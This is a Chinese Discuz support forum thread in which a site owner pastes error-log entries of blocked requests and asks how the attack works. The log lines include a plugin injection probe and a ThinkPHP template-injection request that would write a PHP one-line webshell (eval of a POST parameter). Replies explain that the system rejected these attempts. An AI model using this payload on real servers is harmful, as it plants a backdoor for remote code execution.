論壇被上傳一句話(huà)木馬函數(shù)eval-1719

圍城

十月份
<?PHP exit;?>        1572107794        <b>您當(dāng)前的訪問(wèn)請(qǐng)求當(dāng)中含有非法字符，已經(jīng)被系統(tǒng)拒絕</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        0a040e74e3b12d6c7c171c7bea2df37e        <b>User:</b> uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&amp;id=saya_card:card'&quot;&amp;mod=spacecp'&amp;op=credit'
<?PHP exit;?>        1572108553        <b>您當(dāng)前的訪問(wèn)請(qǐng)求當(dāng)中含有非法字符，已經(jīng)被系統(tǒng)拒絕</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        0a040e74e3b12d6c7c171c7bea2df37e        <b>User:</b> uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&amp;id=saya_card:card'&quot;&amp;mod=spacecp'&amp;op=credit'
<?PHP exit;?>        1572551909        <b>您當(dāng)前的訪問(wèn)請(qǐng)求當(dāng)中含有非法字符，已經(jīng)被系統(tǒng)拒絕</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        e86a1b6a3998a55766370723968ce392        <b>User:</b> uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&amp;templateFile=public/index&amp;prefix=''&amp;content=&lt;php&gt;file_put_contents('hmseo.php','&lt;?php%20@eval($_POST[hm]);?&gt;hmseo')&lt;/php&gt;
十一月份
<?PHP exit;?>        1572630519        <b>您當(dāng)前的訪問(wèn)請(qǐng)求當(dāng)中含有非法字符，已經(jīng)被系統(tǒng)拒絕</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        e86a1b6a3998a55766370723968ce392        <b>User:</b> uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&amp;templateFile=public/index&amp;prefix=''&amp;content=&lt;php&gt;file_put_contents('hmseo.php','&lt;?php%20@eval($_POST[hm]);?&gt;hmseo')&lt;/php&gt;

這兩天連續(xù)被人用同一種方法掛馬了兩次，雖然有用安全軟件，沒(méi)修復(fù)的話(huà)總感覺(jué)心里不踏實(shí)。
有沒(méi)有大佬能看懂是如何掛馬的？怎么修復(fù)？使用安全軟件的Nginx防火墻的話(huà)怎么添加規(guī)則內(nèi)容？是否都需要在過(guò)濾中添加？
問(wèn)題有點(diǎn)多，再次拜謝大佬們了

我知道答案 回答被采納將會(huì)獲得1 貢獻(xiàn) 已有12人回答

耗子

木馬問(wèn)題不是在程序本身，而是服務(wù)器的權(quán)限， 是某種的木馬偽裝成圖片 通過(guò)上傳頭像 帖子等方式就上傳到你服務(wù)器上了，要命的是你服務(wù)器還允許執(zhí)行，
單純的清理木馬沒(méi)用的 要服務(wù)器的安全最主要
您可以加我QQ129820交談，有償服務(wù)，專(zhuān)業(yè)清理+安防


如果在日志里， 可以無(wú)視的

crx349

dz日志里面 是已經(jīng)攔截的 所以沒(méi)傳成功哦

jiangchuankyo

被誤攔截了, 你現(xiàn)在要做的就是關(guān)閉第三方安全軟件, 否則論壇正常功能會(huì)被破壞

圍城

crx349 發(fā)表于 2019-11-4 13:38
dz日志里面 是已經(jīng)攔截的 所以沒(méi)傳成功哦

安全狗報(bào)毒了

圍城

jiangchuankyo 發(fā)表于 2019-11-4 18:36
被誤攔截了, 你現(xiàn)在要做的就是關(guān)閉第三方安全軟件, 否則論壇正常功能會(huì)被破壞 ...

扯淡？？？？？

citywar

這就是別人一個(gè)嘗試  。然后記錄了寫(xiě)入到了log里面。帶某些特征字段  
一般都不用理會(huì)

不信你自己復(fù)制那段字段 加在自己域名后面 瀏覽器訪問(wèn)一次。一樣報(bào)錯(cuò) 記錄在后臺(tái) 然后寫(xiě)入了log日志。
然后就安全狗報(bào)警了 其實(shí)沒(méi)什么用

crx349

圍城 發(fā)表于 2019-11-4 22:13
安全狗報(bào)毒了

安全狗 報(bào)毒 是log文件吧 如果是 那只是關(guān)鍵字觸發(fā)防護(hù)規(guī)則哦

jiangchuankyo

圍城 發(fā)表于 2019-11-4 22:13
安全狗報(bào)毒了

如果別人可以通過(guò)這種關(guān)鍵字符訪問(wèn)方式就能注入成功的話(huà), 那是程序代碼自身有了嚴(yán)重漏洞, 應(yīng)該從修復(fù)漏洞代碼入手, 據(jù)我所知DZ目前沒(méi)有這種漏洞,

如果你安裝一些第三方攔截軟件的話(huà), 它會(huì)不管三七二十一只要內(nèi)容你有一些關(guān)鍵詞字符就給別人誤攔截訪問(wèn)了,
這樣你的論壇很多正常功能也就被破壞了, 這種攔截行為自身和惡意程序又有何區(qū)別呢?

圍城

citywar 發(fā)表于 2019-11-4 22:24
這就是別人一個(gè)嘗試  。然后記錄了寫(xiě)入到了log里面。帶某些特征字段  
一般都不用理會(huì)

謝謝大佬解答